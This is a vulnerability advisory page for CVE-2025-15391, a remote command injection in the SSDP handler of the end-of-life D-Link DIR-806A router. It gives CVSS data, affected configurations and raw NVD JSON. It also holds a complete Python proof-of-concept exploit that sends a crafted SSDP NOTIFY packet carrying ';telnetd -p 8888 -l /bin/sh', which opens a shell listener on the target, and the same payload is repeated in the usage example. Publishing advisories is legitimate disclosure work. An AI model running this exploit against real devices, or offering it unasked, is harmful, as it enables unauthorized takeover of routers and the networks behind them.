Security Vulnerability Report
CVE-2025-15391 CVSS 6.3 MEDIUM

CVE-2025-15391

Published: 2025-12-31 18:15:44
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in D-Link DIR-806A 100CNb11. Affected is the function ssdpcgi_main of the component SSDP Request Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-806a_firmware:100cnb11:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-806a:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-806A 100CNb11 (all versions)
D-Link DIR-806A firmware versions < latest version before end of support

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-15391 PoC - D-Link DIR-806A SSDP Command Injection
# This PoC demonstrates command injection in the SSDP Request Handler

import socket
import sys
import random


def generate_ssdp_notify_with_payload(payload):
    """
    Generate malicious SSDP NOTIFY message with command injection payload
    """
    # SSDP NOTIFY message format
    notify_msg = f"NOTIFY * HTTP/1.1\r\n"
    notify_msg += f"HOST: 239.255.255.250:1900\r\n"
    notify_msg += f"NT: {payload}\r\n"
    notify_msg += f"USN: uuid:{random.randint(1000, 9999)}::upnp:rootdevice\r\n"
    notify_msg += f"NTS: ssdp:alive\r\n"
    notify_msg += f"Cache-Control: max-age=1800\r\n"
    notify_msg += f"SERVER: Linux/2.6 UPnP/1.0 D-Link/1.0\r\n"
    notify_msg += "\r\n"
    return notify_msg


def send_ssdp_exploit(target_ip, target_port=1900, payload=";telnetd -p 8888 -l /bin/sh"):
    """
    Send exploit payload to target D-Link router via SSDP

    Args:
        target_ip: Target router IP address
        target_port: SSDP port (default 1900)
        payload: Command injection payload to execute

    Returns:
        bool: True if exploit sent successfully
    """
    try:
        # Create UDP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)

        # Generate malicious SSDP NOTIFY message
        ssdp_message = generate_ssdp_notify_with_payload(payload)

        # Send to target
        sock.sendto(ssdp_message.encode(), (target_ip, target_port))
        print(f"[+] Exploit payload sent to {target_ip}:{target_port}")
        print(f"[+] Payload: {payload}")
        print(f"[+] Message:\n{ssdp_message}")

        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error sending exploit: {str(e)}")
        return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-15391.py <target_ip> [payload]")
        print("Example: python3 cve-2025-15391.py 192.168.0.1 ';telnetd -p 8888 -l /bin/sh'")
        print("\nNote: This PoC is for educational and authorized testing purposes only.")
        sys.exit(1)

    target_ip = sys.argv[1]
    payload = sys.argv[2] if len(sys.argv) > 2 else ";telnetd -p 8888 -l /bin/sh"

    print(f"[*] CVE-2025-15391 - D-Link DIR-806A SSDP Command Injection")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Exploiting SSDP service on port 1900...")

    send_ssdp_exploit(target_ip, 1900, payload)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15391", "sourceIdentifier": "[email protected]", "published": "2025-12-31T18:15:43.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DIR-806A 100CNb11. Affected is the function ssdpcgi_main of the component SSDP Request Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se ha identificado una debilidad en D-Link DIR-806A 100CNb11. Afecta a la función ssdpcgi_main del componente SSDP Request Handler. Esta manipulación provoca inyección de comandos. El ataque puede iniciarse remotamente. El exploit se ha hecho público y podría ser explotado. 
Esta vulnerabilidad solo afecta a productos que ya no tienen soporte por parte del mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-806a_firmware:100cnb11:*:*:*:*:*:*:*", "matchCriteriaId": "4C2FBCC5-DA27-4DC0-AE6C-91CDFB32DFB9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-806a:-:*:*:*:*:*:*:*", "matchCriteriaId": "926B41A6-009F-444D-BE5C-B517F844E99B"}]}]}], "references": [{"url": 
"https://github.com/ccc-iotsec/cve-/blob/D-Link/D-Link%20DIR-806A%E6%9C%AA%E6%8E%88%E6%9D%83RCE.md", "source": "[email protected]", "tags": ... (truncated)